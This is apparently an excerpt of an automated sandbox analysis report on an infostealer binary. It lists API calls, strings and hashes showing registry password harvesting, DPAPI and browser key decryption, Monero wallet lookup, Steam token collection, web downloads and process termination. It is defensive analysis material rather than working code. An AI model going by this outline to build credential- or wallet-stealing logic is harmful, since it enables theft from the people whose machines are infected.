                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                    • String ID: :
                                    • API String ID: 398153587-3653984579
                                    • Opcode ID: e4660e2f0d5ffbaa9467da49d466c8cd3361874a1aa2dc9a6b9208faeaed30a4
                                    • Instruction ID: 5cf32d96a69289b642b314e6682ec34a50d9059cdf37b25662b5f88784ff9f2d
                                    • Opcode Fuzzy Hash: e4660e2f0d5ffbaa9467da49d466c8cd3361874a1aa2dc9a6b9208faeaed30a4
                                    • Instruction Fuzzy Hash: A931D372E11214AFCB10DBA8EC489AFB7B9EB95301F18851AF50997301DB30ED40CBA1
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 000B820C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B8243
                                    • lstrlen.KERNEL32(00000000), ref: 000B8260
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B8297
                                    • lstrlen.KERNEL32(00000000), ref: 000B82B4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B82EB
                                    • lstrlen.KERNEL32(00000000), ref: 000B8308
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B8337
                                    • lstrlen.KERNEL32(00000000), ref: 000B8351
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B8380
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: e46aac7d4797bd76766a3c3f3ce0c5414ffdf74c1a7eec927203a795cb7d838e
                                    • Instruction ID: c2eedecee3446750ff97c0359ebc2353a8f97e7a7c206aa4f986ee7517860d80
                                    • Opcode Fuzzy Hash: e46aac7d4797bd76766a3c3f3ce0c5414ffdf74c1a7eec927203a795cb7d838e
                                    • Instruction Fuzzy Hash: CA517B71A016129FDB14DF68D858AABB7E8EF41B00F118524ED06DB665EB70EE50CBE0
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000A7805
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 000A784A
                                    • StrStrA.SHLWAPI(?,Password), ref: 000A78B8
                                      • Part of subcall function 000A7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 000A775E
                                      • Part of subcall function 000A7750: RtlAllocateHeap.NTDLL(00000000), ref: 000A7765
                                      • Part of subcall function 000A7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000A778D
                                      • Part of subcall function 000A7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 000A77AD
                                      • Part of subcall function 000A7750: LocalFree.KERNEL32(?), ref: 000A77B7
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000A78EC
                                    • HeapFree.KERNEL32(00000000), ref: 000A78F3
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 000A7A35
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                    • String ID: Password
                                    • API String ID: 356768136-3434357891
                                    • Opcode ID: f0f9aab2b9de8be6c93f483025b0614186715a9f11442e942c58509cd5760ce5
                                    • Instruction ID: cd96a1fc76863dacc1d544f4b724085a598796ed466bea1c525a0c0d15ea3ece
                                    • Opcode Fuzzy Hash: f0f9aab2b9de8be6c93f483025b0614186715a9f11442e942c58509cd5760ce5
                                    • Instruction Fuzzy Hash: F87130B1D0421DAFDB10DFD4DC84AEEB7B9EF49300F10856AE609A7250EB359E85CB91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,000B4F39), ref: 000C4545
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C454C
                                    • wsprintfW.USER32 ref: 000C455B
                                    • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 000C45CA
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 000C45D9
                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 000C45E0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                    • String ID: %hs
                                    • API String ID: 885711575-2783943728
                                    • Opcode ID: a887f87a02266e717e21fbcbc51608ec01f9d6dc5b3dd69adfd5be5a772f2f06
                                    • Instruction ID: c3e16582572d84592fd70358914723f04af2f373b4ff214697a74439b575c3a3
                                    • Opcode Fuzzy Hash: a887f87a02266e717e21fbcbc51608ec01f9d6dc5b3dd69adfd5be5a772f2f06
                                    • Instruction Fuzzy Hash: DC315E72E01209BBEB10DBE4EC49FDE77B8FF45701F10415AFA05A7181EB70AA458BA5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000A1135
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A113C
                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 000A1159
                                    • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 000A1173
                                    • RegCloseKey.ADVAPI32(?), ref: 000A117D
                                    Strings
                                    • wallet_path, xrefs: 000A116D
                                    • SOFTWARE\monero-project\monero-core, xrefs: 000A114F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                    • API String ID: 3225020163-4244082812
                                    • Opcode ID: 424ef43a6e1b05af760998d466b218767f8bbc043b25834ca40b564d1c9e5e5a
                                    • Instruction ID: e48cdfa1ae9e04553b08391f51e8573c6b7d50ef5e1715b4d8e3751043671457
                                    • Opcode Fuzzy Hash: 424ef43a6e1b05af760998d466b218767f8bbc043b25834ca40b564d1c9e5e5a
                                    • Instruction Fuzzy Hash: 1AF0F975A41308BFE7109BA0AC4DEEA7B7CEB04716F100156BB05A6290EAB05E4487A0
                                    APIs
                                    • memcmp.MSVCRT(?,v20,00000003), ref: 000A9E04
                                    • memcmp.MSVCRT(?,v10,00000003), ref: 000A9E42
                                    • LocalAlloc.KERNEL32(00000040), ref: 000A9EA7
                                      • Part of subcall function 000C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 000C71FE
                                    • lstrcpy.KERNEL32(00000000,000D4C48), ref: 000A9FB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpymemcmp$AllocLocal
                                    • String ID: @$v10$v20
                                    • API String ID: 102826412-278772428
                                    • Opcode ID: 25a129ab0ac698019f50b303ce63be91d6b0892bb8113e21a8ee6112cfc00f0b
                                    • Instruction ID: 975ba6e4537e214182c15e91c31e367b056e976f60caa5d4921e764651f2bbaf
                                    • Opcode Fuzzy Hash: 25a129ab0ac698019f50b303ce63be91d6b0892bb8113e21a8ee6112cfc00f0b
                                    • Instruction Fuzzy Hash: B9518B31B10209AFDB20EFA8DC85BDE77A8AF52314F154039F949EB252DB70ED458B90
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000A565A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A5661
                                    • InternetOpenA.WININET(000CCFEC,00000000,00000000,00000000,00000000), ref: 000A5677
                                    • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 000A5692
                                    • InternetReadFile.WININET(?,?,00000400,00000001), ref: 000A56BC
                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 000A56E1
                                    • InternetCloseHandle.WININET(?), ref: 000A56FA
                                    • InternetCloseHandle.WININET(00000000), ref: 000A5701
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                    • String ID:
                                    • API String ID: 1008454911-0
                                    • Opcode ID: 1b8fcff89db16281f90a3f27f1fe28db6162c4fdd17a4fcb3c023f58dc379877
                                    • Instruction ID: 8d0b2e932e61a0f43f574ab50ca76b740c5b3d5f11ef424c9652aedbdd24dfc5
                                    • Opcode Fuzzy Hash: 1b8fcff89db16281f90a3f27f1fe28db6162c4fdd17a4fcb3c023f58dc379877
                                    • Instruction Fuzzy Hash: 5C414C71E01605AFDB14CF94ED88FAAB7F5FF49301F14806AE908AB291D7719D81CB94
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 000C4759
                                    • Process32First.KERNEL32(00000000,00000128), ref: 000C4769
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C477B
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000C479C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 000C47AB
                                    • CloseHandle.KERNEL32(00000000), ref: 000C47B2
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C47C0
                                    • CloseHandle.KERNEL32(00000000), ref: 000C47CB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: 331caedd783a48ace4f34e174502edddc5206bc587b2e902f9cb943fe6d85f79
                                    • Instruction ID: 7dfbde2a4c7302500ff4788fd2d1405b629d6bb15b946d5b777a5986c3c0020a
                                    • Opcode Fuzzy Hash: 331caedd783a48ace4f34e174502edddc5206bc587b2e902f9cb943fe6d85f79
                                    • Instruction Fuzzy Hash: 7501B571A06214AFE7605B64BC8DFEE77BCFB08752F040286F905D1080EF748D808A60
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BE544
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE573
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE581
                                    • lstrcat.KERNEL32(?,00E6D128), ref: 000BE59C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID: P$h
                                    • API String ID: 818526691-864219856
                                    • Opcode ID: 9a5ef00919785796086377a8553dbffce2d6936f5fa02d3a190adfa309b3c4c2
                                    • Instruction ID: a42f257733cea8eb042d19498f2e6d435fc992c7ff180b2e03c93f90c582ea89
                                    • Opcode Fuzzy Hash: 9a5ef00919785796086377a8553dbffce2d6936f5fa02d3a190adfa309b3c4c2
                                    • Instruction Fuzzy Hash: 0951CB75E10108AFD754EB64EC56EEE33BDEB58300F04046EFA1697252EE70AE408B91
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 000B8435
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B846C
                                    • lstrlen.KERNEL32(00000000), ref: 000B84B2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B84E9
                                    • lstrlen.KERNEL32(00000000), ref: 000B84FF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B852E
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000B853E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 566657378cebb55f46aae6517dbd5c7d7450f6d23b5d38adf13a78759b76c1ac
                                    • Instruction ID: f88445e2886483102723781da15ed6da910d46fff8ef8e9eba3e576a74ad952c
                                    • Opcode Fuzzy Hash: 566657378cebb55f46aae6517dbd5c7d7450f6d23b5d38adf13a78759b76c1ac
                                    • Instruction Fuzzy Hash: 27516D719006029FCB64DF68D888A9BB7F9EF55700F14C469EC86DB265EB30ED41CB50
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 000C2925
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C292C
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E5B8C0,00000000,00020119,000C28A9), ref: 000C294B
                                    • RegQueryValueExA.ADVAPI32(000C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 000C2965
                                    • RegCloseKey.ADVAPI32(000C28A9), ref: 000C296F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: cd1d5216a7d82c0757fed50591c7a9420bccf234605324c1217c153999662874
                                    • Instruction ID: 767c739cd27884cfdf5b72e56b74bc42eb33f6397dfb958d189735824c244163
                                    • Opcode Fuzzy Hash: cd1d5216a7d82c0757fed50591c7a9420bccf234605324c1217c153999662874
                                    • Instruction Fuzzy Hash: 7E01BC75A01318AFD310DBA4AC5DFAB7BBCEB49716F10009AFE45DB280EA315D448BA0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 000C2895
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C289C
                                      • Part of subcall function 000C2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 000C2925
                                      • Part of subcall function 000C2910: RtlAllocateHeap.NTDLL(00000000), ref: 000C292C
                                      • Part of subcall function 000C2910: RegOpenKeyExA.ADVAPI32(80000002,00E5B8C0,00000000,00020119,000C28A9), ref: 000C294B
                                      • Part of subcall function 000C2910: RegQueryValueExA.ADVAPI32(000C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 000C2965
                                      • Part of subcall function 000C2910: RegCloseKey.ADVAPI32(000C28A9), ref: 000C296F
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E5B8C0,00000000,00020119,000B9500), ref: 000C28D1
                                    • RegQueryValueExA.ADVAPI32(000B9500,00E6DCF0,00000000,00000000,00000000,000000FF), ref: 000C28EC
                                    • RegCloseKey.ADVAPI32(000B9500), ref: 000C28F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: a989b32303af5418ca54ee80f88deb6f40bf62942fc868d93c2ed0174a72c880
                                    • Instruction ID: 045bfd8276d012e0ce7708d7a4d731240811e0395fd670000c77a3a453217fcf
                                    • Opcode Fuzzy Hash: a989b32303af5418ca54ee80f88deb6f40bf62942fc868d93c2ed0174a72c880
                                    • Instruction Fuzzy Hash: FE01AD71A02208BFDB10ABA4FC4DFAE7B7DEB44316F00015AFE08D2290EA709D4487A0
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 000A723E
                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 000A7279
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A7280
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 000A72C3
                                    • HeapFree.KERNEL32(00000000), ref: 000A72CA
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 000A7329
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                    • String ID:
                                    • API String ID: 174687898-0
                                    • Opcode ID: 2c6c8085a31262f4eb13523397d89c5e464737ba930fd7f8e6eba1c9940d314a
                                    • Instruction ID: c1625c38c91a9f4b4fff1f556718b4a0d704fc22bc657fc4f3c523b3be9e2ceb
                                    • Opcode Fuzzy Hash: 2c6c8085a31262f4eb13523397d89c5e464737ba930fd7f8e6eba1c9940d314a
                                    • Instruction Fuzzy Hash: DE415D72B056069BDB60CFA9EC84BAAB3E8FB85305F14856AEC4DC7340E631ED409B50
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 000A9CA8
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000A9CDA
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000A9D03
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2746078483-738592651
                                    • Opcode ID: a2417292fce26ce0c6b881a5df648ca31f04bf13c606774050b7736e4c0dcd31
                                    • Instruction ID: f8455512c1cdbfb2c8eff6b829e2de4521518abe8874f6e8ca995db39fd79b3b
                                    • Opcode Fuzzy Hash: a2417292fce26ce0c6b881a5df648ca31f04bf13c606774050b7736e4c0dcd31
                                    • Instruction Fuzzy Hash: F9419031B102099BCB21EFF8DC856EEBBF4AF56314F048469E915AB253EA30ED40C791
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BEA24
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BEA53
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BEA61
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000BEA7A
                                    • lstrcat.KERNEL32(?,00E68820), ref: 000BEA8D
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000BEA9F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: 43f5db71febe888b595a3f2f30f08c790a59175e4bfcba5cf9304aafeb0f6661
                                    • Instruction ID: 26103074416a1e829ae37c9b9beb95584c7c4644d094cdbe8b6cdbe803b4561e
                                    • Opcode Fuzzy Hash: 43f5db71febe888b595a3f2f30f08c790a59175e4bfcba5cf9304aafeb0f6661
                                    • Instruction Fuzzy Hash: FE416771E11118EFCB55EBA8EC46EED73B8BF58300F004469B61A9B291DF709E848B51
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BECDF
                                    • lstrlen.KERNEL32(00000000), ref: 000BECF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BED1D
                                    • lstrlen.KERNEL32(00000000), ref: 000BED24
                                    • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 000BED52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: steam_tokens.txt
                                    • API String ID: 367037083-401951677
                                    • Opcode ID: 2392a20c658e4be3433ffbc8f5bc0cbd799fdf5c539ce69f3a9e380ce7a61588
                                    • Instruction ID: 91be87a207eff26efc71b5af0fd2a66421369a0e32d9fcbc05bcd48a56de004e
                                    • Opcode Fuzzy Hash: 2392a20c658e4be3433ffbc8f5bc0cbd799fdf5c539ce69f3a9e380ce7a61588
                                    • Instruction Fuzzy Hash: 2F316131A115559BC721BBBCEC4AADE7BA5AF52700F044135F846DB623EB34DC0687D2
                                    APIs
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,000A140E), ref: 000A9A9A
                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,000A140E), ref: 000A9AB0
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,000A140E), ref: 000A9AC7
                                    • ReadFile.KERNEL32(00000000,00000000,?,000A140E,00000000,?,?,?,000A140E), ref: 000A9AE0
                                    • LocalFree.KERNEL32(?,?,?,?,000A140E), ref: 000A9B00
                                    • CloseHandle.KERNEL32(00000000,?,?,?,000A140E), ref: 000A9B07
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: a5e949656521d977ff27f5245a18a5b58396bf15456462abd3ceef0a84e0318d
                                    • Instruction ID: a8a7a07854dc49c643a6203b5f7761c62faf121b726c0571bdddd07cf0857dd3
                                    • Opcode Fuzzy Hash: a5e949656521d977ff27f5245a18a5b58396bf15456462abd3ceef0a84e0318d
                                    • Instruction Fuzzy Hash: 1F112E71A11219AFEB10DFA9ED88EAF77ACEB05740F10416AF91596280EB70DD40CBA1
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C5B14
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA188
                                      • Part of subcall function 000CA173: std::exception::exception.LIBCMT ref: 000CA1AE
                                    • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 000C5B7C
                                    • memmove.MSVCRT(00000000,?,?), ref: 000C5B89
                                    • memmove.MSVCRT(00000000,?,?), ref: 000C5B98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long
                                    • API String ID: 2052693487-3788999226
                                    • Opcode ID: ee35e8151e4518e506a5bc68a7d41794ea79127e69da85e913d3fa616e790861
                                    • Instruction ID: 87a1920c0dc03bbee58ca873ca818136ebb0d96535280706e958048ad83ec35f
                                    • Opcode Fuzzy Hash: ee35e8151e4518e506a5bc68a7d41794ea79127e69da85e913d3fa616e790861
                                    • Instruction Fuzzy Hash: B9416F75B005199FCB18DF6CCC95BAEBBE5EB88310F15822DE909E7384E730AD408B90
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000B7D58
                                      • Part of subcall function 000CA1C0: std::exception::exception.LIBCMT ref: 000CA1D5
                                      • Part of subcall function 000CA1C0: std::exception::exception.LIBCMT ref: 000CA1FB
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000B7D76
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000B7D91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
